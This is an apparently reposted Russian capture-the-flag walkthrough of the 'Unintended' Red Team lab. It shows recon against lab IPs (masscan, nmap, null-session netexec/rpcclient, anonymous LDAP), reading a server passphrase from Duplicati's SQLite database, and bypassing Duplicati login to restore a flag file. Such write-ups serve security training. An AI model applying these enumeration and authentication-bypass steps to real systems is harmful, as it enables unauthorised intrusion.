src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/840\/e31\/172\/840e31172a0b9de2027780e3106576ea.png\" width=\"559\" height=\"58\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/840\/e31\/172\/840e31172a0b9de2027780e3106576ea.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/840\/e31\/172\/840e31172a0b9de2027780e3106576ea.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041f\u0440\u043e\u0432\u0435\u0440\u0438\u043c \u0431\u0430\u0437\u0443 \u0434\u0430\u043d\u043d\u044b\u0445.<\/p>\n<p><strong>tree restore\/source\/root\/scripts\/duplicati<\/strong><\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/c01\/1c5\/bc8\/c011c5bc85fc8bb9c98303e088f32d1e.png\" width=\"397\" height=\"165\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/c01\/1c5\/bc8\/c011c5bc85fc8bb9c98303e088f32d1e.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/c01\/1c5\/bc8\/c011c5bc85fc8bb9c98303e088f32d1e.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0418 \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u043c \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u0441 \u0431\u0430\u0437\u043e\u0439 \u0434\u0430\u043d\u043d\u044b\u0445.<\/p>\n<p><strong>sqlite3 restore\/source\/root\/scripts\/duplicati\/config\/Duplicati-server.sqlite<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/a93\/dde\/a2a\/a93ddea2afea12f6f5e87cdf1053e476.png\" width=\"646\" height=\"68\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/a93\/dde\/a2a\/a93ddea2afea12f6f5e87cdf1053e476.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/a93\/dde\/a2a\/a93ddea2afea12f6f5e87cdf1053e476.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0417\u0430\u043f\u0440\u043e\u0441\u0438\u043c \u0442\u0430\u0431\u043b\u0438\u0446\u044b.<\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/5fe\/d07\/37c\/5fed0737ce80a59ae5bd5563ee8640b0.png\" width=\"439\" height=\"82\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/5fe\/d07\/37c\/5fed0737ce80a59ae5bd5563ee8640b0.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/5fe\/d07\/37c\/5fed0737ce80a59ae5bd5563ee8640b0.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041d\u0430\u043c \u043d\u0443\u0436\u043d\u0430 \u0442\u0430\u0431\u043b\u0438\u0446\u0430 \u0441 \u043e\u043f\u0446\u0438\u044f\u043c\u0438.<\/p>\n<p><strong>select * from Option;<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/168\/3e4\/f32\/1683e4f32d5cb13a5708552890347e09.png\" width=\"653\" height=\"462\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/168\/3e4\/f32\/1683e4f32d5cb13a5708552890347e09.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/168\/3e4\/f32\/1683e4f32d5cb13a5708552890347e09.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0422\u0435\u043f\u0435\u0440\u044c \u0443 \u043d\u0430\u0441 \u0435\u0441\u0442\u044c \u043f\u0430\u0441\u0441-\u0444\u0440\u0430\u0437\u0430.<\/p>\n<p>\u0421\u0435\u0439\u0447\u0430\u0441 \u043d\u0430\u043c \u043d\u0443\u0436\u043d\u043e \u043f\u0440\u043e\u0432\u0435\u0441\u0442\u0438 \u0430\u0442\u0430\u043a\u0443 \u043d\u0430 <strong>Duplicati, <\/strong>\u043f\u043e\u043b\u043d\u044b\u0439 \u0440\u0430\u0437\u0431\u043e\u0440 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0437\u0434\u0435\u0441\u044c &#8212; <a href=\"https:\/\/read.martiandefense.org\/duplicati-bypassing-login-authentication-with-server-passphrase-024d6991e9ee\" rel=\"noopener noreferrer nofollow\">https:\/\/read.martiandefense.org\/duplicati-bypassing-login-authentication-with-server-passphrase-024d6991e9ee<\/a>, \u043d\u043e \u043c\u044b \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0441\u044f \u0441\u043a\u0440\u0438\u043f\u0442\u043e\u043c.<\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/cc4\/2a2\/c77\/cc42a2c77478e3e9cdd2f4769aa09dd2.png\" width=\"835\" height=\"471\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/cc4\/2a2\/c77\/cc42a2c77478e3e9cdd2f4769aa09dd2.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/cc4\/2a2\/c77\/cc42a2c77478e3e9cdd2f4769aa09dd2.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/f16\/183\/23f\/f1618323fc2aa5607218267fab9aa832.png\" width=\"1100\" height=\"91\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/f16\/183\/23f\/f1618323fc2aa5607218267fab9aa832.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/f16\/183\/23f\/f1618323fc2aa5607218267fab9aa832.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041f\u0440\u0438\u0432\u043e\u0434\u0438\u043c \u0434\u0430\u043d\u043d\u044b\u0435 \u043a \u0442\u0430\u043a\u043e\u043c\u0443 \u0432\u0438\u0434\u0443.<\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/c52\/5df\/606\/c525df606d6b6eb794eccd862e922f18.png\" width=\"937\" height=\"148\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/c52\/5df\/606\/c525df606d6b6eb794eccd862e922f18.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/c52\/5df\/606\/c525df606d6b6eb794eccd862e922f18.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041f\u043e\u0434\u043c\u0435\u043d\u044f\u0435\u043c \u044d\u0442\u0438 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b \u0432 <strong>Storage <\/strong>\u0438 \u043f\u0435\u0440\u0435\u043b\u043e\u0433\u0438\u043d\u0435\u0432\u0430\u0435\u043c\u0441\u044f.<\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/af7\/468\/5de\/af74685de6360d4c0ed91754ba81867f.png\" width=\"1148\" height=\"534\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/af7\/468\/5de\/af74685de6360d4c0ed91754ba81867f.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/af7\/468\/5de\/af74685de6360d4c0ed91754ba81867f.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/865\/3d0\/c86\/8653d0c8662067ad1a466c0ef421b92b.png\" width=\"1151\" height=\"644\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/865\/3d0\/c86\/8653d0c8662067ad1a466c0ef421b92b.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/865\/3d0\/c86\/8653d0c8662067ad1a466c0ef421b92b.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0421\u043e\u0437\u0434\u0430\u0435\u043c \u043d\u043e\u0432\u043e\u0435 \u0437\u0430\u0434\u0430\u043d\u0438\u0435 \u0434\u043b\u044f \u0431\u044d\u043a\u0430\u043f\u0430.<\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/b3c\/aa5\/827\/b3caa582778af701473c0f14a83a8604.png\" width=\"1142\" height=\"636\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/b3c\/aa5\/827\/b3caa582778af701473c0f14a83a8604.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/b3c\/aa5\/827\/b3caa582778af701473c0f14a83a8604.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p> \u0414\u0430\u0451\u043c \u0438\u043c\u044f \u0437\u0430\u0434\u0430\u043d\u0438\u044e \u0438 \u0432\u044b\u043a\u043b\u044e\u0447\u0430\u0435\u043c \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u0435.<\/p>\n<p><strong>\u041a \u0441\u043e\u0436\u0430\u043b\u0435\u043d\u0438\u044e \u0437\u0434\u0435\u0441\u044c \u0441\u0440\u0430\u0431\u043e\u0442\u0430\u043b \u043b\u0438\u043c\u0438\u0442 \u043d\u0430 \u043a\u0430\u0440\u0442\u0438\u043d\u043a\u0438 \u0438 \u0434\u0430\u043b\u044c\u0448\u0435 \u043f\u043e\u0439\u0434\u0435\u0442 \u0442\u043e\u043b\u044c\u043a\u043e \u0442\u0435\u043a\u0441\u0442. \u041a\u0440\u0430\u0441\u0438\u0432\u044b\u0439 \u041f\u0414\u0424 \u043c\u043e\u0436\u043d\u043e \u0437\u0430\u0431\u0440\u0430\u0442\u044c \u0443 \u043c\u0435\u043d\u044f \u043d\u0430 \u043a\u0430\u043d\u0430\u043b\u0435 &#8212; <\/strong><a href=\"https:\/\/t.me\/yashechka85\" rel=\"noopener noreferrer nofollow\"><strong>https:\/\/t.me\/yashechka85<\/strong><\/a><\/p>\n<p>\u0412\u044b\u0431\u0438\u0440\u0430\u0435\u043c \u043f\u0430\u043f\u043a\u0443 \u043d\u0430\u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0431\u044d\u043a\u0430\u043f\u0430.<\/p>\n<p>\u0412\u044b\u0431\u0438\u0440\u0430\u0435\u043c, \u0447\u0442\u043e \u043c\u044b \u0431\u0443\u0434\u0435\u043c \u0431\u044d\u043a\u0430\u043f\u0438\u0442\u044c.<\/p>\n<p>\u0412 \u0448\u0435\u0434\u0443\u043b\u0435\u0440\u0435 \u0432\u044b\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u043c \u0432\u0441\u0435 \u0434\u043d\u0438.<\/p>\n<p>\u0421\u043e\u0445\u0440\u0430\u043d\u044f\u0435\u043c \u0437\u0430\u0434\u0430\u043d\u0438\u0435.<\/p>\n<p>\u0422\u0435\u043f\u0435\u0440\u044c \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c \u0437\u0430\u0434\u0430\u043d\u0438\u0435.<\/p>\n<p>\u041f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u043c \u043f\u0430\u043f\u043a\u0443 <strong>\/tmp\/flag\/<\/strong>.<\/p>\n<p>\u0418 \u0441\u0434\u0435\u043b\u0430\u0435\u043c \u0432\u043e\u0441\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0444\u0430\u0439\u043b\u043e\u0432.<\/p>\n<p>\u0412\u0432\u043e\u0434\u0438\u043c \u043f\u0443\u0442\u044c.<\/p>\n<p>\u0418 \u0434\u0435\u043b\u0430\u0435\u043c \u0441\u0438\u043d\u0445\u0440\u043e\u043d\u0438\u0437\u0430\u0446\u0438\u044e.<\/p>\n<p>\u0418 \u0437\u0430\u0431\u0438\u0440\u0430\u0435\u043c \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439 \u0444\u043b\u0430\u0433.<\/p>\n<p>\u0412\u0441\u0435\u043c \u0444\u043b\u0430\u0433\u0438 \u0437\u0430\u0445\u0432\u0430\u0447\u0435\u043d\u044b, \u043f\u043e\u0437\u0434\u0440\u0430\u0432\u043b\u044f\u044e \u0441 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435\u043c \u0435\u0449\u0451 \u043e\u0434\u043d\u043e\u0433\u043e \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0430.<\/p>\n<\/div>\n<p>\u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438 <a href=\"https:\/\/habr.com\/ru\/articles\/1041376\/\">https:\/\/habr.com\/ru\/articles\/1041376\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Unintended \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u043f\u0435\u0440\u0435\u0432\u0435\u043b\u0430 \u0441\u0432\u043e\u044e \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443 \u043d\u0430 Active Directory. \u0420\u0443\u043a\u043e\u0432\u043e\u0434\u0441\u0442\u0432\u043e \u043e\u0431\u0435\u0441\u043f\u043e\u043a\u043e\u0435\u043d\u043e \u0442\u0435\u043c, \u0447\u0442\u043e \u0443\u0441\u0442\u0430\u0440\u0435\u0432\u0448\u0438\u0435 \u043c\u0435\u0442\u043e\u0434\u044b \u0438 \u0443\u043f\u0443\u0449\u0435\u043d\u043d\u044b\u0435 \u0438\u0437 \u0432\u0438\u0434\u0443 \u043e\u0448\u0438\u0431\u043a\u0438 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u043c\u043e\u0433\u0443\u0442 \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u0441\u0440\u0435\u0434\u0443 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0439 \u0434\u043b\u044f \u0432\u043d\u0435\u0448\u043d\u0438\u0445 \u0443\u0433\u0440\u043e\u0437. \u0412\u0430\u0448\u0435\u0439 \u0444\u0438\u0440\u043c\u0435 \u043f\u043e\u0440\u0443\u0447\u0435\u043d\u043e \u043f\u0440\u043e\u0432\u0435\u0441\u0442\u0438 \u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043d\u0430 \u043f\u0440\u043e\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u0435 \u0441 \u0446\u0435\u043b\u044c\u044e \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u0438\u044f, \u043c\u043e\u0436\u0435\u0442 \u043b\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043f\u0435\u0440\u0435\u0439\u0442\u0438 \u043e\u0442 \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u043f\u043e\u043b\u043d\u043e\u043c\u0443 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044e \u043d\u0430\u0434 \u0434\u043e\u043c\u0435\u043d\u043e\u043c.Unintended \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u043e\u043f\u044b\u0442 \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u043d\u044b\u0445 \u043e\u0448\u0438\u0431\u043e\u043a \u043f\u0440\u0438 \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u0438 Active Directory, \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0443\u044f, \u043a\u0430\u043a \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u043f\u0435\u0440\u0435\u043a\u043b\u044e\u0447\u0430\u0442\u044c\u0441\u044f \u043c\u0435\u0436\u0434\u0443 \u0441\u043b\u0443\u0436\u0431\u0430\u043c\u0438 \u0434\u043b\u044f \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439. \u041c\u0430\u0448\u0438\u043d\u0430 \u0441\u043e\u0447\u0435\u0442\u0430\u0435\u0442 \u043c\u0435\u0442\u043e\u0434\u044b \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 Linux \u0441 \u043f\u0443\u0442\u044f\u043c\u0438 \u0430\u0442\u0430\u043a \u043d\u0430 Active Directory, \u0447\u0442\u043e \u0434\u0435\u043b\u0430\u0435\u0442 \u0435\u0451 \u0446\u0435\u043d\u043d\u043e\u0439 \u043f\u043b\u043e\u0449\u0430\u0434\u043a\u043e\u0439 \u0434\u043b\u044f \u043f\u0440\u0430\u043a\u0442\u0438\u043a\u0438 \u043a\u0430\u043a \u0434\u043b\u044f \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u043e\u0432 \u043f\u043e \u043d\u0430\u0441\u0442\u0443\u043f\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0439, \u0442\u0430\u043a \u0438 \u043f\u043e \u043e\u0431\u043e\u0440\u043e\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438.Unintended \u043f\u0440\u0435\u0434\u043d\u0430\u0437\u043d\u0430\u0447\u0435\u043d\u0430 \u0434\u043b\u044f \u0442\u0435\u0445, \u043a\u0442\u043e \u0445\u043e\u0447\u0435\u0442 \u0440\u0430\u0441\u0448\u0438\u0440\u0438\u0442\u044c \u0441\u0432\u043e\u0438 \u0437\u043d\u0430\u043d\u0438\u044f \u043e\u0431 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 Active Directory \u0432 \u0441\u0440\u0435\u0434\u0435, \u043e\u0440\u0438\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u043d\u0430 Linux. \u041c\u0430\u0448\u0438\u043d\u0430 \u0445\u043e\u0440\u043e\u0448\u043e \u043f\u043e\u0434\u0445\u043e\u0434\u0438\u0442 \u0434\u043b\u044f \u0442\u0435\u0445, \u043a\u0442\u043e \u0445\u043e\u0447\u0435\u0442 \u043f\u043e\u043d\u044f\u0442\u044c \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0432 \u0433\u0438\u0431\u0440\u0438\u0434\u043d\u043e\u0439 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0435.\u0412 \u044d\u0442\u043e\u0439 \u043b\u0430\u0431\u043e\u0440\u0430\u0442\u043e\u0440\u0438\u0438 Red Team Operator \u0443\u0440\u043e\u0432\u043d\u044f I \u0438\u0433\u0440\u043e\u043a\u0438 \u0441\u0442\u043e\u043b\u043a\u043d\u0443\u0442\u0441\u044f \u0441\u043e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c\u0438 \u0442\u0435\u043c\u0430\u043c\u0438:- \u041f\u0435\u0440\u0435\u0447\u0438\u0441\u043b\u0435\u043d\u0438\u0435 \u0440\u0435\u0437\u0435\u0440\u0432\u043d\u044b\u0445 \u043a\u043e\u043f\u0438\u0439 Active Directory- \u0411\u043e\u043a\u043e\u0432\u043e\u0435 \u043f\u0435\u0440\u0435\u043c\u0435\u0449\u0435\u043d\u0438\u0435- \u041f\u0438\u0432\u043e\u0442\u0438\u043d\u0433- \u041f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 Linux- \u041a\u0440\u0438\u043c\u0438\u043d\u0430\u043b\u0438\u0441\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0430\u043d\u0430\u043b\u0438\u0437 \u0440\u0435\u0437\u0435\u0440\u0432\u043d\u044b\u0445 \u043a\u043e\u043f\u0438\u0439- \u0410\u0442\u0430\u043a\u0438 \u043d\u0430 \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u041f\u043e \u0437\u0430\u0434\u0430\u043d\u0438\u044e \u043d\u0430\u043c \u0434\u0430\u043d\u044b 3 \u0430\u0439\u043f\u0438 \u0430\u0434\u0440\u0435\u0441\u0430.10.13.38.5710.13.38.5810.13.38.59\u041f\u0440\u043e\u0432\u0435\u0440\u0438\u043c, \u0447\u0442\u043e \u043e\u043d\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b.ping -c 1 10.13.38.57 | grep ttlping -c 1 10.13.38.58 | grep ttlping -c 1 10.13.38.59 | grep ttl\u041f\u0440\u043e\u0441\u043a\u0430\u043d\u0438\u0440\u0443\u0435\u043c \u043f\u043e\u0440\u0442\u044b \u043d\u0430 \u044d\u0442\u0438\u0445 \u043c\u0430\u0448\u0438\u043d\u0430\u0445.  sudo masscan -p1-65535,U:1-65535 10.13.38.57 &#8212;rate=500 -e tun0 &gt; unintended.57sudo masscan -p1-65535,U:1-65535 10.13.38.58 &#8212;rate=500 -e tun0 &gt; unintended.58sudo masscan -p1-65535,U:1-65535 10.13.38.59 &#8212;rate=500 -e tun0 &gt; unintended.59\u0422\u0435\u043f\u0435\u0440\u044c \u043f\u0440\u043e\u0441\u043a\u0430\u043d\u0438\u0440\u0443\u0435\u043c \u043f\u043e\u0440\u0442\u044b \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e nmap\u043e\u043c.nmap -p22,53,88,135,139,389,445,464,636,3268,3269,49152,49153,49154 -sC -sV -oA nmap\/unintended.57 10.13.38.57nmap -p21,22 -sC -sV -oA nmap\/unintended.58 10.13.38.58nmap -p22,80 -sC -sV -oA nmap\/unintended.59 10.13.38.59\u041a\u0430\u043a \u0432\u0438\u0434\u043d\u043e \u0438\u0437 \u043f\u0435\u0440\u0432\u043e\u0433\u043e \u0441\u043a\u0430\u043d\u0430, \u043d\u0430\u0448 \u0434\u043e\u043c\u0435\u043d \u043d\u0430\u0437\u044b\u0432\u0430\u0435\u0442\u0441\u044f unintended.vl, \u0430 \u0438\u043c\u044f \u043c\u0430\u0448\u0438\u043d\u044b dc.\u0414\u0430\u0432\u0430\u0439\u0442\u0435 \u0434\u043e\u0431\u0430\u0432\u0438\u043c \u044d\u0442\u0443 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u0432 \u0444\u0430\u0439\u043b hosts.  sudo nano \/etc\/hosts\u0415\u0441\u043b\u0438 \u043f\u0435\u0440\u0435\u0439\u0434\u0435\u043c \u043d\u0430 \u0432\u0435\u0431 \u0441\u0435\u0440\u0432\u0438\u0441 \u043f\u043e \u0430\u0434\u0440\u0435\u0441\u0443 10.13.38.59 \u0442\u043e \u0443\u0432\u0438\u0434\u0438\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0443\u044e \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0443.\u041d\u0430\u0441 \u043f\u0440\u0438\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0430 \u0437\u0430\u0433\u043b\u0443\u0448\u043a\u0430.\u041f\u0440\u043e\u0432\u0435\u0440\u0438\u043c \u0434\u043e\u043c\u0435\u043d \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440 \u043d\u0430 \u043d\u0443\u043b\u0435\u0432\u0443\u044e \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044e.netexec smb 10.13.38.57 -u &#187; -p &#187; &#8212;users\u0418\u043b\u0438 \u0447\u0435\u0440\u0435\u0437 RPC.rpcclient -U &#187; -N 10.13.38.57 -c enumdomusers | cut -d'[&#8216; -f2 | cut -d&#8217;]&#8217; -f1\u041d\u0430\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b \u0438\u043c\u0435\u043d\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u0434\u0430\u0432\u0430\u0439\u0442\u0435 \u0441\u043e\u0445\u0440\u0430\u043d\u0438\u043c \u0438\u0445 \u0432 \u0444\u0430\u0439\u043b users.txt.nano users.txt\u0422\u0430\u043a\u0436\u0435 nmap \u0441\u043a\u0430\u0437\u0430\u043b \u043d\u0430\u043c, \u0447\u0442\u043e \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u0430 \u0430\u043d\u043e\u043d\u0438\u043c\u043d\u0430\u044f \u043f\u0440\u0438\u0432\u044f\u0437\u043a\u0430 LDAP \u2014 \u043e\u0442\u043b\u0438\u0447\u043d\u044b\u0439 \u0432\u0435\u043a\u0442\u043e\u0440 \u043f\u0435\u0440\u0435\u0447\u0438\u0441\u043b\u0435\u043d\u0438\u044f.\u0414\u0430\u0432\u0430\u0439\u0442\u0435 \u043f\u0435\u0440\u0435\u0447\u0438\u0441\u043b\u0438\u043c LDAP.  ldapsearch -H ldap:\/\/dc.unintended.vl -x -LLL -s base \u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e: \u0414\u043e\u043c\u0435\u043d \u2014 unintended.vl \u041a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440 &#8212; dc.unintended.vl (\u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043d\u0430\u044f \u0443\u0447\u0451\u0442\u043a\u0430: dc$) \u0422\u0438\u043f &#8212; Samba AD (\u043d\u0435 Windows) \u0424\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b\u044c\u043d\u044b\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c  -2008 R2 (\u0443\u0440\u043e\u0432\u0435\u043d\u044c 4) \u0410\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044f &#8212; NTLM, Kerberos (GSSAPI\/SPNEGO) \u0420\u0435\u043f\u043b\u0438\u043a\u0430\u0446\u0438\u044f &#8212; \u0412\u043a\u043b\u044e\u0447\u0435\u043d\u0430, \u0441\u0435\u0440\u0432\u0435\u0440 \u2014 Global Catalog \u0410\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c &#8212; \u041e\u0447\u0435\u043d\u044c \u043d\u0438\u0437\u043a\u0430\u044f (USN=4488) LDAP Controls  &#8212; \u041f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0430 \u043f\u0430\u0433\u0438\u043d\u0430\u0446\u0438\u0438, \u0437\u0430\u043f\u0440\u043e\u0441\u0430 \u043f\u0440\u0430\u0432, \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0414\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0435 \u0440\u0430\u0437\u0434\u0435\u043b\u044b &#8212; 5 \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u043e\u0432 (\u0434\u043e\u043c\u0435\u043d, 